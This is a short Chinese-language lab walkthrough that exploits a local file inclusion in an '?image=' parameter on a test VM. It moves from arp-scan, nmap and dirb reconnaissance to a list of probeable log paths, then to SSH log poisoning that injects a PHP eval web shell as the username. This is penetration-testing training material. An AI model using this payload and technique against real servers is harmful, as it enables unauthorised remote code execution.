1.扫主机
arp-scan -I eth0 -l
2.扫端口
nmap -A -p- -sS -T4 --min-rate=10000 192.168.163.155
3.扫目录
发现dirsearch 扫不到,可以换dirb扫一下
4.挨个目录看一眼
5.最后在目录下的info.php有phpinfo信息
发现allow_url_fopen
和 allow_url_include
处于一开一闭状态
allow_url_fopen: 代表这个选项决定是否允许 PHP 使用文件函数,通过url能否直接访问文件。当该选项设置为
On
时,PHP 可以通过 URL(例如http://
或https://
)直接访问文件;当设置为Off
时,则只能访问本地文件。allow_url_include: 专门用于包括远程文件。具体来说,当该选项设置为
On
时,你可以使用include
或require
函数从远程 URL 包含文件;当设置为Off
时,则不允许这样做。由于安全原因,通常不推荐开启这个选项。
6.右键查看源码,可以发现可以通过拼接?image=‘/x/x’来访问文件
7.访问成功,证明漏洞存在
8.使用burp爆破,查看有哪些日志文件是可以访问到的
/var/log/syslog
/var/log/messages
/var/log/auth.log
/var/log/dmesg
/var/log/apache2/
/var/log/httpd/
/var/log/mysql/
/var/log/nginx/
/var/log/samba/
/var/log/maillog
/var/log/mail.log
/var/log/boot.log
/var/log/cron
9.由前边的端口扫描发现,2211对应的是ssh,我们可以用同一网段的主机,我这里用的是centos7,对其进行ssh连接,留下痕迹
ssh [email protected] -p 2211
10.我们的用户名是可以传上去的,那我们可以把用户名换成一句话木马,应该也是能传上去
ssh '<?php @eval($_POST[1]);?>'@192.168.163.155 -p 2211